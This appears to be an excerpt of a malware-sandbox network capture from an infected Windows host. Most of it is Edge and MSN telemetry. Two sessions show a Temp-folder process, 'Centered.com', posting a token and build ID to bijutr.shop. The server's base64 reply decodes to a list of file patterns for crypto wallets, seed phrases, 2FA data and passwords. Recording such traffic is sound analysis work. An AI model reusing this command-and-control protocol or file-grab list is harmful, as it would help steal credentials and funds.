                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:42 GMT
                                                                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.7 | 49912 | 20.110.205.119 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:43 UTC | 1261 | OUT | GET /c.gif?rnd=1735286739103&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=00d263f4b17344089ebf5bec809664e2&activityId=00d263f4b17344089ebf5bec809664e2&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=CA9C2839891B4BAE9B46E9232B945869&MUID=309DCA2A26BF68F127E0DF4827176945 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: c.msn.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1; SM=T
2024-12-27 06:10:43 UTC | 982 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                      P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                      Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                      Set-Cookie: MUID=309DCA2A26BF68F127E0DF4827176945; domain=.msn.com; expires=Wed, 21-Jan-2026 06:10:43 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                      Set-Cookie: SRM_M=309DCA2A26BF68F127E0DF4827176945; domain=c.msn.com; expires=Wed, 21-Jan-2026 06:10:43 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                      Set-Cookie: MR=0; domain=c.msn.com; expires=Fri, 03-Jan-2025 06:10:43 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                      Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Fri, 27-Dec-2024 06:20:43 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:42 GMT
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Content-Length: 42
2024-12-27 06:10:43 UTC | 42 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.7 | 49919 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:44 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----J589000R1N7YUAS0ZU37
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:44 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 35 38 39 30 30 30 52 31 4e 37 59 55 41 53 30 5a 55 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 38 39 30 30 30 52 31 4e 37 59 55 41 53 30 5a 55 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 35 38 39 30 30 30 52 31 4e 37 59 55 41 53 30 5a 55 33 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------J589000R1N7YUAS0ZU37Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------J589000R1N7YUAS0ZU37Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------J589000R1N7YUAS0ZU37Cont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:45 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:45 UTC2208INData Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                                      Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                                                      40 | 192.168.2.7 | 49927 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:47 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JMOPHL6P8YM7YMOHD2NG
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 7013
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:47 UTC7013OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4d 4f 50 48 4c 36 50 38 59 4d 37 59 4d 4f 48 44 32 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4d 4f 50 48 4c 36 50 38 59 4d 37 59 4d 4f 48 44 32 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 4d 4f 50 48 4c 36 50 38 59 4d 37 59 4d 4f 48 44 32 4e 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------JMOPHL6P8YM7YMOHD2NGContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------JMOPHL6P8YM7YMOHD2NGContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------JMOPHL6P8YM7YMOHD2NGCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:48 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                                                      41 | 192.168.2.7 | 49925 | 51.104.15.253 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:47 UTC | 1071 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735286744806&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 11929
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:47 UTC11929OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 38 3a 30 35 3a 34 34 2e 38 30 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 31 38 38 30 30 33 66 2d 32 39 36 30 2d 34 62 64 31 2d 61 38 32 65 2d 34 30 66 36 63 38 31 62 61 39 63 36 22 2c 22 65 70 6f 63 68 22 3a 22 33 34 32 32 36 38 30 30 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T08:05:44.805Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"8188003f-2960-4bd1-a82e-40f6c81ba9c6","epoch":"342268007"},"app":{"locale"
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:48 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=de4b02ba1292490bad62bc53cdc801aa&HASH=de4b&LV=202412&V=4&LU=1735279848147; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:10:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=0ca64fff9db744e8b78d7733632d30c0; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:40:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      time-delta-millis: -6896659
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:47 GMT
                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                                                      42 | 192.168.2.7 | 49926 | 51.104.15.253 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:47 UTC | 1070 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735286744810&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 5219
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-27 06:10:47 UTC | 5219 | OUT
                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T08:05:44.810Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"8188003f-2960-4bd1-a82e-40f6c81ba9c6","epoch":"342268007"},"app":{"locale"
2024-12-27 06:10:48 UTC | 894 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=1056d7a641db46cebb3a61c9797249ac&HASH=1056&LV=202412&V=4&LU=1735279848293; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:10:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=888311c736d8493581a45128611e51c2; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:40:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      time-delta-millis: -6896517
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:48 GMT
                                                                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.7 | 49928 | 51.104.15.253 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:48 UTC | 1060 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735286745671&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 5417
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-27 06:10:48 UTC | 5417 | OUT
                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T08:05:45.670Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"8188003f-2960-4bd1-a82e-40f6c81ba9c6","epoch":"342268007"},"app":{"locale"
2024-12-27 06:10:49 UTC | 894 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=fd2824251c744b43aabf794576f16519&HASH=fd28&LV=202412&V=4&LU=1735279849108; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:10:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=090977ea8b09442fa4b741a1d8e33004; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:40:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      time-delta-millis: -6896563
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:48 GMT
                                                                                                                                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.7 | 49929 | 51.104.15.253 | 443 | 2340 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:49 UTC | 1060 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735286745807&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 9876
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-27 06:10:49 UTC | 9876 | OUT
                                                                                                                                                                                                                                                                                      Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-27T08:05:45.806Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"8188003f-2960-4bd1-a82e-40f6c81ba9c6","epoch":"342268007"},"app":{"loca
2024-12-27 06:10:49 UTC  894  IN  HTTP/1.1 204 No Content
